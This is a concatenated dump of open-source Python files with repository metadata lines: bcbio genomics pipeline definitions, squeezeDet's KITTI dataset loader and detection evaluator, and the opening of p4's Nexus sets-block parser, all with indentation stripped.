print("---", i, len(samples))
for sample in (utils.to_single_data(x) for x in samples):
print(" ", sample["description"], sample.get("region"), \
utils.get_in(sample, ("config", "algorithm", "variantcaller")), \
utils.get_in(sample, ("config", "algorithm", "jointcaller")), \
utils.get_in(sample, ("metadata", "batch")), \
[x.get("variantcaller") for x in sample.get("variants", [])], \
sample.get("work_bam"), \
sample.get("vrn_file"))
def STEP(samples, title=None):
if title:
print(title + ':')
import pprint
pprint.pprint([(s[0]['description'], s[0]['metadata']['phenotype'], str(s[0]['config']['algorithm']['qc'])) for s in samples])
def standardpipeline(config, run_info_yaml, parallel, dirs, samples):
## Alignment and preparation requiring the entire input file (multicore cluster)
with prun.start(_wres(parallel, ["aligner", "samtools", "sambamba"]),
samples, config, dirs, "multicore") as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
with profile.report("alignment", dirs):
samples = run_parallel("process_alignment", samples)
with profile.report("callable regions", dirs):
samples = run_parallel("prep_samples", [samples])
samples = run_parallel("postprocess_alignment", samples)
samples = run_parallel("combine_sample_regions", [samples])
samples = region.clean_sample_data(samples)
## Quality control
with prun.start(_wres(parallel, ["fastqc", "qsignature", "kraken", "gatk", "samtools", "preseq"]),
samples, config, dirs, "multicore2") as run_parallel:
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
logger.info("Timing: finished")
return samples
def rnaseqpipeline(config, run_info_yaml, parallel, dirs, samples):
samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples)
with prun.start(_wres(parallel, ["aligner", "picard", "samtools"],
ensure_mem={"tophat": 10, "tophat2": 10, "star": 2, "hisat2": 8}),
samples, config, dirs, "alignment",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("alignment", dirs):
samples = run_parallel("disambiguate_split", [samples])
samples = run_parallel("process_alignment", samples)
with prun.start(_wres(parallel, ["samtools", "cufflinks"]),
samples, config, dirs, "rnaseqcount") as run_parallel:
with profile.report("disambiguation", dirs):
samples = disambiguate.resolve(samples, run_parallel)
with profile.report("transcript assembly", dirs):
samples = rnaseq.assemble_transcripts(run_parallel, samples)
with profile.report("estimate expression (threaded)", dirs):
samples = rnaseq.quantitate_expression_parallel(samples, run_parallel)
with prun.start(_wres(parallel, ["dexseq", "express"]), samples, config,
dirs, "rnaseqcount-singlethread", max_multicore=1) as run_parallel:
with profile.report("estimate expression (single threaded)", dirs):
samples = rnaseq.quantitate_expression_noparallel(samples, run_parallel)
samples = rnaseq.combine_files(samples)
with prun.start(_wres(parallel, ["gatk", "vardict"]), samples, config,
dirs, "rnaseq-variation") as run_parallel:
with profile.report("RNA-seq variant calling", dirs):
samples = rnaseq.rnaseq_variant_calling(samples, run_parallel)
with prun.start(_wres(parallel, ["samtools", "fastqc", "qualimap",
"kraken", "gatk", "preseq"], ensure_mem={"qualimap": 4}),
samples, config, dirs, "qc") as run_parallel:
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
with profile.report("bcbioRNAseq loading", dirs):
tools_on = dd.get_in_samples(samples, dd.get_tools_on)
bcbiornaseq_on = tools_on and "bcbiornaseq" in tools_on
if bcbiornaseq_on and len(samples) < 3:
logger.warn("bcbioRNASeq needs at least three samples total, skipping.")
else:
run_parallel("run_bcbiornaseqload", [sample])
logger.info("Timing: finished")
return samples
def fastrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples):
samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples)
ww = initialize_watcher(samples)
with prun.start(_wres(parallel, ["samtools"]), samples, config,
dirs, "fastrnaseq") as run_parallel:
with profile.report("fastrnaseq", dirs):
samples = rnaseq.fast_rnaseq(samples, run_parallel)
ww.report("fastrnaseq", samples)
samples = rnaseq.combine_files(samples)
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
ww.report("qcsummary", samples)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for samples in samples:
run_parallel("upload_samples_project", [samples])
logger.info("Timing: finished")
return samples
def singlecellrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples):
samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples)
with prun.start(_wres(parallel, ["samtools", "rapmap"]), samples, config,
dirs, "singlecell-rnaseq") as run_parallel:
with profile.report("singlecell-rnaseq", dirs):
samples = rnaseq.singlecell_rnaseq(samples, run_parallel)
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for samples in samples:
run_parallel("upload_samples_project", [samples])
logger.info("Timing: finished")
return samples
def smallrnaseqpipeline(config, run_info_yaml, parallel, dirs, samples):
# causes a circular import at the top level
from bcbio.srna.group import report as srna_report
samples = rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples)
with prun.start(_wres(parallel, ["aligner", "picard", "samtools"],
ensure_mem={"bowtie": 8, "bowtie2": 8, "star": 2}),
[samples[0]], config, dirs, "alignment") as run_parallel:
with profile.report("prepare", dirs):
samples = run_parallel("seqcluster_prepare", [samples])
with profile.report("seqcluster alignment", dirs):
samples = run_parallel("srna_alignment", [samples])
with prun.start(_wres(parallel, ["aligner", "picard", "samtools"],
ensure_mem={"tophat": 10, "tophat2": 10, "star": 2, "hisat2": 8}),
samples, config, dirs, "alignment_samples",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("alignment", dirs):
samples = run_parallel("process_alignment", samples)
with prun.start(_wres(parallel, ["picard", "miraligner"]),
samples, config, dirs, "annotation") as run_parallel:
with profile.report("small RNA annotation", dirs):
samples = run_parallel("srna_annotation", samples)
with prun.start(_wres(parallel, ["seqcluster", "mirge"],
ensure_mem={"seqcluster": 8}),
[samples[0]], config, dirs, "cluster") as run_parallel:
with profile.report("cluster", dirs):
samples = run_parallel("seqcluster_cluster", [samples])
with prun.start(_wres(parallel, ["picard", "fastqc"]),
samples, config, dirs, "qc") as run_parallel:
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
with profile.report("report", dirs):
srna_report(samples)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
return samples
def chipseqpipeline(config, run_info_yaml, parallel, dirs, samples):
with prun.start(_wres(parallel, ["aligner", "picard"]),
samples, config, dirs, "multicore",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
with profile.report("alignment", dirs):
samples = run_parallel("prepare_sample", samples)
samples = run_parallel("trim_sample", samples)
samples = run_parallel("disambiguate_split", [samples])
samples = run_parallel("process_alignment", samples)
with profile.report("disambiguation", dirs):
samples = disambiguate.resolve(samples, run_parallel)
samples = run_parallel("clean_chipseq_alignment", samples)
with prun.start(_wres(parallel, ["peakcaller"]),
samples, config, dirs, "peakcalling",
multiplier = peaks._get_multiplier(samples)) as run_parallel:
with profile.report("peakcalling", dirs):
samples = peaks.peakcall_prepare(samples, run_parallel)
samples = peaks.call_consensus(samples)
samples = run_parallel("run_chipseq_count", samples)
samples = peaks.create_peaktable(samples)
with prun.start(_wres(parallel, ["picard", "fastqc"]),
samples, config, dirs, "qc") as run_parallel:
with profile.report("quality control", dirs):
samples = qcsummary.generate_parallel(samples, run_parallel)
samples = atac.create_ataqv_report(samples)
with profile.report("upload", dirs):
samples = run_parallel("upload_samples", samples)
for sample in samples:
run_parallel("upload_samples_project", [sample])
logger.info("Timing: finished")
return samples
def wgbsseqpipeline(config, run_info_yaml, parallel, dirs, samples):
with prun.start(_wres(parallel, ["fastqc", "picard"], ensure_mem={"fastqc" : 4}),
samples, config, dirs, "trimming") as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
samples = run_parallel("prepare_sample", samples)
samples = run_parallel("trim_bs_sample", samples)
with prun.start(_wres(parallel, ["aligner", "bismark", "picard", "samtools"]),
samples, config, dirs, "multicore",
multiplier=alignprep.parallel_multiplier(samples)) as run_parallel:
with profile.report("alignment", dirs):
samples = run_parallel("process_alignment", samples)
with prun.start(_wres(parallel, ['samtools']), samples, config, dirs,
'deduplication') as run_parallel:
with profile.report('deduplicate', dirs):
samples = run_parallel('deduplicate_bismark', samples)
with prun.start(_wres(parallel, ["caller"], ensure_mem={"caller": 5}),
samples, config, dirs, "multicore2",
multiplier=24) as run_parallel:
with profile.report("cpg calling", dirs):
samples = run_parallel("cpg_calling", samples)
# with prun.start(_wres(parallel, ["picard", "fastqc", "samtools"]),
# samples, config, dirs, "qc") as run_parallel:
# with profile.report("quality control", dirs):
# samples = qcsummary.generate_parallel(samples, run_parallel)
return samples
def rnaseq_prep_samples(config, run_info_yaml, parallel, dirs, samples):
"""
organizes RNA-seq and small-RNAseq samples, converting from BAM if
necessary and trimming if necessary
"""
pipeline = dd.get_in_samples(samples, dd.get_analysis)
trim_reads_set = any([tz.get_in(["algorithm", "trim_reads"], d) for d in dd.sample_data_iterator(samples)])
resources = ["picard"]
needs_trimming = (_is_smallrnaseq(pipeline) or trim_reads_set)
if needs_trimming:
resources.append("atropos")
with prun.start(_wres(parallel, resources),
samples, config, dirs, "trimming",
max_multicore=1 if not needs_trimming else None) as run_parallel:
with profile.report("organize samples", dirs):
samples = run_parallel("organize_samples", [[dirs, config, run_info_yaml,
[x[0]["description"] for x in samples]]])
samples = run_parallel("prepare_sample", samples)
if needs_trimming:
with profile.report("adapter trimming", dirs):
if _is_smallrnaseq(pipeline):
samples = run_parallel("trim_srna_sample", samples)
else:
samples = run_parallel("trim_sample", samples)
return samples
def _get_pipeline(item):
from bcbio.log import logger
analysis_type = item.get("analysis", "").lower()
if analysis_type not in SUPPORTED_PIPELINES:
logger.error("Cannot determine which type of analysis to run, "
"set in the run_info under details.")
sys.exit(1)
else:
return SUPPORTED_PIPELINES[analysis_type]
def _pair_samples_with_pipelines(run_info_yaml, config):
"""Map samples defined in input file to pipelines to run.
"""
samples = config_utils.load_config(run_info_yaml)
if isinstance(samples, dict):
resources = samples.pop("resources")
samples = samples["details"]
else:
resources = {}
ready_samples = []
for sample in samples:
if "files" in sample:
del sample["files"]
# add any resources to this item to recalculate global configuration
usample = copy.deepcopy(sample)
usample.pop("algorithm", None)
if "resources" not in usample:
usample["resources"] = {}
for prog, pkvs in resources.items():
if prog not in usample["resources"]:
usample["resources"][prog] = {}
if pkvs is not None:
for key, val in pkvs.items():
usample["resources"][prog][key] = val
config = config_utils.update_w_custom(config, usample)
sample["resources"] = {}
ready_samples.append(sample)
paired = [(x, _get_pipeline(x)) for x in ready_samples]
d = defaultdict(list)
for x in paired:
d[x[1]].append([x[0]])
return d, config
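# For reference, a minimal run_info YAML that the pairing above understands looks
# roughly like this (all values invented):
#   details:
#     - description: Test1
#       analysis: variant2
#       files: [/path/to/sample_R1.fastq.gz, /path/to/sample_R2.fastq.gz]
#       algorithm: {aligner: bwa}
#   resources:
#     gatk: {jvm_opts: ["-Xms500m", "-Xmx3500m"]}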
SUPPORTED_PIPELINES = {"variant2": variant2pipeline,
"snp calling": variant2pipeline,
"variant": variant2pipeline,
"standard": standardpipeline,
"minimal": standardpipeline,
"rna-seq": rnaseqpipeline,
"smallrna-seq": smallrnaseqpipeline,
"chip-seq": chipseqpipeline,
"wgbs-seq": wgbsseqpipeline,
"fastrna-seq": fastrnaseqpipeline,
"scrna-seq": singlecellrnaseqpipeline}
def _is_smallrnaseq(pipeline):
return pipeline.lower() == "smallrna-seq"
| mit | 4,928,597,947,818,260,000 | 50.204461 | 130 | 0.619864 | false |
BichenWuUCB/squeezeDet | src/dataset/kitti.py | 1 | 10284 | # Author: Bichen Wu ([email protected]) 08/25/2016
"""Image data base class for kitti"""
import cv2
import os
import numpy as np
import subprocess
from dataset.imdb import imdb
from utils.util import bbox_transform_inv, batch_iou
class kitti(imdb):
def __init__(self, image_set, data_path, mc):
imdb.__init__(self, 'kitti_'+image_set, mc)
self._image_set = image_set
self._data_root_path = data_path
self._image_path = os.path.join(self._data_root_path, 'training', 'image_2')
self._label_path = os.path.join(self._data_root_path, 'training', 'label_2')
self._classes = self.mc.CLASS_NAMES
self._class_to_idx = dict(zip(self.classes, xrange(self.num_classes)))
# a list of string indices of images in the directory
self._image_idx = self._load_image_set_idx()
# a dict of image_idx -> [[cx, cy, w, h, cls_idx]]. x,y,w,h are not divided by
# the image width and height
self._rois = self._load_kitti_annotation()
## batch reader ##
self._perm_idx = None
self._cur_idx = 0
# TODO(bichen): add a random seed as parameter
self._shuffle_image_idx()
self._eval_tool = './src/dataset/kitti-eval/cpp/evaluate_object'
def _load_image_set_idx(self):
image_set_file = os.path.join(
self._data_root_path, 'ImageSets', self._image_set+'.txt')
assert os.path.exists(image_set_file), \
'File does not exist: {}'.format(image_set_file)
with open(image_set_file) as f:
image_idx = [x.strip() for x in f.readlines()]
return image_idx
def _image_path_at(self, idx):
image_path = os.path.join(self._image_path, idx+'.png')
assert os.path.exists(image_path), \
'Image does not exist: {}'.format(image_path)
return image_path
def _load_kitti_annotation(self):
def _get_obj_level(obj):
height = float(obj[7]) - float(obj[5]) + 1
truncation = float(obj[1])
occlusion = float(obj[2])
if height >= 40 and truncation <= 0.15 and occlusion <= 0:
return 1
elif height >= 25 and truncation <= 0.3 and occlusion <= 1:
return 2
elif height >= 25 and truncation <= 0.5 and occlusion <= 2:
return 3
else:
return 4
idx2annotation = {}
for index in self._image_idx:
filename = os.path.join(self._label_path, index+'.txt')
with open(filename, 'r') as f:
lines = f.readlines()
f.close()
bboxes = []
for line in lines:
obj = line.strip().split(' ')
try:
cls = self._class_to_idx[obj[0].lower().strip()]
except:
continue
if self.mc.EXCLUDE_HARD_EXAMPLES and _get_obj_level(obj) > 3:
continue
xmin = float(obj[4])
ymin = float(obj[5])
xmax = float(obj[6])
ymax = float(obj[7])
assert xmin >= 0.0 and xmin <= xmax, \
'Invalid bounding box x-coord xmin {} or xmax {} at {}.txt' \
.format(xmin, xmax, index)
assert ymin >= 0.0 and ymin <= ymax, \
'Invalid bounding box y-coord ymin {} or ymax {} at {}.txt' \
.format(ymin, ymax, index)
x, y, w, h = bbox_transform_inv([xmin, ymin, xmax, ymax])
bboxes.append([x, y, w, h, cls])
idx2annotation[index] = bboxes
return idx2annotation
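  # Each line of a KITTI label file follows the standard KITTI layout, e.g.
  # (values illustrative):
  #   Car 0.00 0 1.85 387.63 181.54 423.81 203.12 1.67 1.87 3.69 -16.53 2.39 58.49 1.57
  # The parser above only consumes the class name (field 0), truncation (1),
  # occlusion (2) and the 2D box xmin/ymin/xmax/ymax (fields 4-7).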
def evaluate_detections(self, eval_dir, global_step, all_boxes):
"""Evaluate detection results.
Args:
eval_dir: directory to write evaluation logs
global_step: step of the checkpoint
all_boxes: all_boxes[cls][image] = N x 5 arrays of
[xmin, ymin, xmax, ymax, score]
Returns:
aps: array of average precisions.
names: class names corresponding to each ap
"""
det_file_dir = os.path.join(
eval_dir, 'detection_files_{:s}'.format(global_step), 'data')
if not os.path.isdir(det_file_dir):
os.makedirs(det_file_dir)
for im_idx, index in enumerate(self._image_idx):
filename = os.path.join(det_file_dir, index+'.txt')
with open(filename, 'wt') as f:
for cls_idx, cls in enumerate(self._classes):
dets = all_boxes[cls_idx][im_idx]
for k in xrange(len(dets)):
f.write(
'{:s} -1 -1 0.0 {:.2f} {:.2f} {:.2f} {:.2f} 0.0 0.0 0.0 0.0 0.0 '
'0.0 0.0 {:.3f}\n'.format(
cls.lower(), dets[k][0], dets[k][1], dets[k][2], dets[k][3],
dets[k][4])
)
cmd = self._eval_tool + ' ' \
+ os.path.join(self._data_root_path, 'training') + ' ' \
+ os.path.join(self._data_root_path, 'ImageSets',
self._image_set+'.txt') + ' ' \
+ os.path.dirname(det_file_dir) + ' ' + str(len(self._image_idx))
print('Running: {}'.format(cmd))
status = subprocess.call(cmd, shell=True)
aps = []
names = []
for cls in self._classes:
det_file_name = os.path.join(
os.path.dirname(det_file_dir), 'stats_{:s}_ap.txt'.format(cls))
if os.path.exists(det_file_name):
with open(det_file_name, 'r') as f:
lines = f.readlines()
assert len(lines) == 3, \
'Line number of {} should be 3'.format(det_file_name)
aps.append(float(lines[0].split('=')[1].strip()))
aps.append(float(lines[1].split('=')[1].strip()))
aps.append(float(lines[2].split('=')[1].strip()))
else:
aps.extend([0.0, 0.0, 0.0])
names.append(cls+'_easy')
names.append(cls+'_medium')
names.append(cls+'_hard')
return aps, names
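  # Reminder of the expected all_boxes layout (a made-up example with a single
  # class and a single image):
  #   all_boxes = [
  #       [ [[100., 120., 200., 180., 0.9]] ],   # all_boxes[cls_idx][im_idx] -> N x 5
  #   ]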
def do_detection_analysis_in_eval(self, eval_dir, global_step):
det_file_dir = os.path.join(
eval_dir, 'detection_files_{:s}'.format(global_step), 'data')
det_error_dir = os.path.join(
eval_dir, 'detection_files_{:s}'.format(global_step),
'error_analysis')
if not os.path.exists(det_error_dir):
os.makedirs(det_error_dir)
det_error_file = os.path.join(det_error_dir, 'det_error_file.txt')
stats = self.analyze_detections(det_file_dir, det_error_file)
ims = self.visualize_detections(
image_dir=self._image_path,
image_format='.png',
det_error_file=det_error_file,
output_image_dir=det_error_dir,
num_det_per_type=10
)
return stats, ims
def analyze_detections(self, detection_file_dir, det_error_file):
def _save_detection(f, idx, error_type, det, score):
f.write(
'{:s} {:s} {:.1f} {:.1f} {:.1f} {:.1f} {:s} {:.3f}\n'.format(
idx, error_type,
det[0]-det[2]/2., det[1]-det[3]/2.,
det[0]+det[2]/2., det[1]+det[3]/2.,
self._classes[int(det[4])],
score
)
)
# load detections
self._det_rois = {}
for idx in self._image_idx:
det_file_name = os.path.join(detection_file_dir, idx+'.txt')
with open(det_file_name) as f:
lines = f.readlines()
f.close()
bboxes = []
for line in lines:
obj = line.strip().split(' ')
cls = self._class_to_idx[obj[0].lower().strip()]
xmin = float(obj[4])
ymin = float(obj[5])
xmax = float(obj[6])
ymax = float(obj[7])
score = float(obj[-1])
x, y, w, h = bbox_transform_inv([xmin, ymin, xmax, ymax])
bboxes.append([x, y, w, h, cls, score])
bboxes.sort(key=lambda x: x[-1], reverse=True)
self._det_rois[idx] = bboxes
# do error analysis
num_objs = 0.
num_dets = 0.
num_correct = 0.
num_loc_error = 0.
num_cls_error = 0.
num_bg_error = 0.
num_repeated_error = 0.
num_detected_obj = 0.
with open(det_error_file, 'w') as f:
for idx in self._image_idx:
gt_bboxes = np.array(self._rois[idx])
num_objs += len(gt_bboxes)
detected = [False]*len(gt_bboxes)
det_bboxes = self._det_rois[idx]
if len(gt_bboxes) < 1:
continue
for i, det in enumerate(det_bboxes):
if i < len(gt_bboxes):
num_dets += 1
ious = batch_iou(gt_bboxes[:, :4], det[:4])
max_iou = np.max(ious)
gt_idx = np.argmax(ious)
if max_iou > 0.1:
if gt_bboxes[gt_idx, 4] == det[4]:
if max_iou >= 0.5:
if i < len(gt_bboxes):
if not detected[gt_idx]:
num_correct += 1
detected[gt_idx] = True
else:
num_repeated_error += 1
else:
if i < len(gt_bboxes):
num_loc_error += 1
_save_detection(f, idx, 'loc', det, det[5])
else:
if i < len(gt_bboxes):
num_cls_error += 1
_save_detection(f, idx, 'cls', det, det[5])
else:
if i < len(gt_bboxes):
num_bg_error += 1
_save_detection(f, idx, 'bg', det, det[5])
for i, gt in enumerate(gt_bboxes):
if not detected[i]:
_save_detection(f, idx, 'missed', gt, -1.0)
num_detected_obj += sum(detected)
f.close()
print ('Detection Analysis:')
print (' Number of detections: {}'.format(num_dets))
print (' Number of objects: {}'.format(num_objs))
print (' Percentage of correct detections: {}'.format(
num_correct/num_dets))
print (' Percentage of localization error: {}'.format(
num_loc_error/num_dets))
print (' Percentage of classification error: {}'.format(
num_cls_error/num_dets))
print (' Percentage of background error: {}'.format(
num_bg_error/num_dets))
print (' Percentage of repeated detections: {}'.format(
num_repeated_error/num_dets))
print (' Recall: {}'.format(
num_detected_obj/num_objs))
out = {}
out['num of detections'] = num_dets
out['num of objects'] = num_objs
out['% correct detections'] = num_correct/num_dets
out['% localization error'] = num_loc_error/num_dets
out['% classification error'] = num_cls_error/num_dets
out['% background error'] = num_bg_error/num_dets
out['% repeated error'] = num_repeated_error/num_dets
out['% recall'] = num_detected_obj/num_objs
return out
| bsd-2-clause | -1,532,657,115,107,445,500 | 33.743243 | 82 | 0.550661 | false |
blaiseli/p4-phylogenetics | p4/nexussets.py | 1 | 69575 | import os
import sys
import string
import array
import types
import copy
from var import var
# Don't bother with NexusToken2, cuz sets blocks are small
from nexustoken import nexusSkipPastNextSemiColon, safeNextTok
import func
from p4exceptions import P4Error
# [Examples from the paup manual,
# but note the bad charpartition subset names '1' and '2'. P4 would not allow those names.]
# charset coding = 2-457 660-896;
# charset noncoding = 1 458-659 897-898;
# charpartition gfunc = 1:coding, 2:noncoding;
# Notes from MadSwofMad97.
# TaxSet taxset-name [({Standard | Vector})] = taxon-set; # standard is default
# TaxPartition partition-name [([{[No]Tokens}] # tokens is default
# [{standard|vector}])] # standard is default
# = subset-name:taxon-set [, subset-name:taxon-set...];
# eg TaxSet outgroup=1-4;
# TaxSet beetles=Omma-.;
#
# taxpartition populations=1:1-3, 2:4-6, 3:7 8; # note bad taxpartition names 1, 2, 3
# taxpartition populations (vector notokens) = 11122233;
#
class CaseInsensitiveDict(dict):
"""A dictionary that is case insensitive, for Nexus"""
def __init__(self, default=None):
dict.__init__(self)
self.default = default
#self.keyDict = {}
def __setitem__(self, key, val):
if type(key) != types.StringType:
gm = ["CaseInsensitiveDict()"]
gm.append("The key must be a string. Got '%s'" % key)
raise P4Error(gm)
lowKey = string.lower(key)
dict.__setitem__(self, lowKey, val)
#self.keyDict[string.lower(key)] = key
def __getitem__(self, key):
if type(key) != types.StringType:
gm = ["CaseInsensitiveDict()"]
gm.append("The key must be a string. Got '%s'" % key)
raise P4Error(gm)
lowKey = string.lower(key)
try:
return dict.__getitem__(self, lowKey)
except KeyError:
return self.default
def get(self, key, *args):
if not args:
args = (self.default,)
return dict.get(self, string.lower(key), *args)
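# A minimal usage sketch (illustrative only): keys are lowered on insertion and
# lookup, so any casing reaches the same entry.
# d = CaseInsensitiveDict()
# d['MySet'] = 1
# assert d['myset'] == 1 and d['MYSET'] == 1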
#########################################################################
# CLASS NexusSets
#########################################################################
class NexusSets(object):
"""A container for Nexus CharSet, CharPartition, and TaxSet objects.
When the first Nexus sets block is read, a NexusSets object is
made and saved as ``var.nexusSets``. ``CharSet``, ``TaxSet``, and
``CharPartition`` objects are placed in it, as they are
read/created. TaxPartition commands are not implemented. Here is
a simple nexus sets block that only has charsets::
#nexus
begin sets;
charset pos1 = 1-.\\3;
charset pos2 = 2-.\\3;
charset pos3 = 3-.\\3;
end;
To get the third positions only, you could say::
read('myAlignment.phy')
a = var.alignments[0]
read('mySets.nex') # the sets block above
b = a.subsetUsingCharSet('pos3')
What happens above when the mySets.nex file is read is that a
NexusSets object is created as ``var.nexusSets`` and populated
with the three charsets as CharSet objects. Then when you asked
for a subset, a copy of that NexusSets object was made and applied
to the alignment.
Notice that the length of the alignment is not part of the
information in the sets block, and so things remain undefined
in ``var.nexusSets`` until the nexus sets are applied to a
particular alignment. One consequence of this somewhat awkward
system is that the same charsets could then be applied to another
alignment of a different size::
read('myAlignment.phy')
aA = var.alignments[0]
read('anotherAlignment.nex')
aB = var.alignments[1]
read('mySets.nex') # the sets block above
bA = aA.subsetUsingCharSet('pos3')
bB = aB.subsetUsingCharSet('pos3')
In the above example, ``bA.nexusSets`` and ``bB.nexusSets`` are
both derived from ``var.nexusSets`` but are independent of it, and
different from each other.
So when an Alignment (or Tree object) wants to use ``var.nexusSets``, it
makes a copy of it, and attaches the copy as
theAlignment.nexusSets or theTree.nexusSets
Here is another example, including a ``charPartition`` definition::
begin sets;
charset gene1 = 1-213;
charset gene2 = 214-497;
charPartition cpName = gene1:gene1, gene2:gene2;
end;
For an alignment, you can then set a **character partition** by ::
a.setCharPartition(cpName)
Do this *before* you make a Data object, to partition the alignment.
You can also use charsets to extract subsets, eg via::
b = a.subsetUsingCharSet(csName)
Setting a charPartition or asking for a subset will trigger
applying ``var.nexusSets`` to the alignment, but you can also do
it explicitly, by::
myTree.setNexusSets()
NexusSets knows about predefined 'constant', 'gapped', and
'remainder' charsets. It does not know about 'missambig' or
'uninf' charsets.
NexusSets can either be in the default standard format or in
vector format -- you can change them to vector format with the ::
mySet.vectorize()
method, and you can change them to standard format with the ::
mySet.standardize()
method. For taxSets, you can use actual tax names (rather than
numbers or ranges) by invoking the method::
myTaxSet.setUseTaxNames()
which sets the attribute 'useTaxNames' to True, and puts the
taxNames for the taxSet in the ::
taxSet.taxNames
list, which might be handy.
You can see the current state of a NexusSets object using ::
myNexusSets.dump()
It can also be written out as a nexus sets block. If an Alignment object
has a ``nexusSets`` attribute then if you ask the alignment to write
itself to a nexus file then the Alignment.nexusSets is also
written. If you would rather it not be written, delete it first.
If you would rather it be written to a separate file, do that
first and then delete it.
One nice thing about taxsets is that :meth:`Tree.Tree.tv` and
:meth:`Tree.Tree.btv` know about them and can display them.
"""
def __init__(self):
self.charSets = []
self.charSetsDict = CaseInsensitiveDict()
self.charSetLowNames = []
self.taxSets = []
self.taxSetsDict = CaseInsensitiveDict()
self.taxSetLowNames = []
self.charPartitions = []
self.charPartitionsDict = CaseInsensitiveDict()
self.charPartitionLowNames = []
self.charPartition = None
#self.alignment = None
self.aligNChar = None
self.taxNames = []
self.nTax = None
self.predefinedCharSetLowNames = ['constant', 'gapped']
# The nexus format defines several "predefined" charSets.
# For all datatypes:
# constant
# gapped
# missambig
# remainder
# uninf
# I only have implemented 2-- constant and gapped. The
# 'remainder' charSet is handled by p4, but not as a CharSet
# object, since its content depends on the context.
cS = CharSet(self)
cS.num = -1
cS.name = 'constant'
cS.lowName = 'constant'
cS.format = 'vector'
# self.charSets.append(cS)
self.constant = cS
self.charSetsDict['constant'] = self.constant
cS = CharSet(self)
cS.num = -1
cS.name = 'gapped'
cS.lowName = 'gapped'
cS.format = 'vector'
# self.charSets.append(cS)
self.gapped = cS
self.charSetsDict['gapped'] = self.gapped
def _continueReadingFromNexusFile(self, flob):
gm = ['NexusSets._continueReadingFromNexusFile()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
if 0:
print gm[0]
print ' var.nexus_doFastNextTok = %s' % var.nexus_doFastNextTok
nexusSkipPastNextSemiColon(flob)
commandName = safeNextTok(flob, gm[0])
lowCommandName = string.lower(commandName)
# print 'got lowCommandName = %s' % lowCommandName
while lowCommandName not in [None, 'end', 'endblock']:
# print "Got lowCommandName '%s'" % lowCommandName
if lowCommandName == 'charset':
self._readCharSetCommand(flob)
elif lowCommandName == 'charpartition':
self._readCharPartitionCommand(flob)
elif lowCommandName == 'taxset':
self._readTaxSetCommand(flob)
elif lowCommandName == 'taxpartition':
print
print gm[0]
if len(gm) > 1:
print gm[1]
print " Sorry-- taxpartition is not implemented."
nexusSkipPastNextSemiColon(flob)
else:
gm.append("Got unrecognized sets block command '%s'" %
commandName)
raise P4Error(gm)
commandName = safeNextTok(
flob, 'NexusSets.continueReadingFromNexusFile()')
lowCommandName = string.lower(commandName)
def _readCharSetCommand(self, flob):
# We have just read 'charset'. The next thing we expect is the charset
# name.
gm = ['NexusSets._readCharSetCommand()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
name = func.nexusUnquoteName(
safeNextTok(flob, 'NexusSets: _readCharSetCommand'))
# print "readCharSetCommand: got name '%s'" % name
lowName = string.lower(name)
if not func.nexusCheckName(lowName):
gm.append("Bad charSet name '%s'" % name)
raise P4Error(gm)
# Check for duped names
if lowName in self.charSetLowNames:
gm.append("Duplicated charSet name '%s'" % name)
raise P4Error(gm)
elif lowName in self.predefinedCharSetLowNames:
gm.append(
"You cannot use the name '%s' -- it is predefined." % name)
raise P4Error(gm)
cs = CharSet(self)
cs.name = name
cs.lowName = lowName
cs.readTaxOrCharSetDefinition(flob)
cs.num = len(self.charSets)
self.charSets.append(cs)
self.charSetsDict[name] = cs
self.charSetLowNames.append(cs.lowName)
def _readTaxSetCommand(self, flob):
# We have just read 'taxset'. The next thing we expect is the taxset
# name.
gm = ['NexusSets._readTaxSetCommand()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
name = func.nexusUnquoteName(
safeNextTok(flob, 'NexusSets: readTaxSetCommand'))
# print "readTaxSetCommand: got name '%s'" % name
lowName = string.lower(name)
if not func.nexusCheckName(lowName):
gm.append("Bad taxSet name '%s'" % name)
raise P4Error(gm)
# Check for duped names
if lowName in self.taxSetLowNames:
gm.append("Duplicated taxSet name '%s'" % name)
raise P4Error(gm)
ts = TaxSet(self)
ts.name = name
ts.lowName = lowName
ts.readTaxOrCharSetDefinition(flob)
ts.num = len(self.taxSets)
self.taxSets.append(ts)
self.taxSetsDict[name] = ts
self.taxSetLowNames.append(ts.lowName)
def _readCharPartitionCommand(self, flob):
gm = ['NexusSets._readCharPartitionCommand()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
name = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
# print "readCharPartitionCommand: got name '%s'" % name
lowName = string.lower(name)
if not func.nexusCheckName(lowName):
gm.append("Bad charPartition name '%s'" % name)
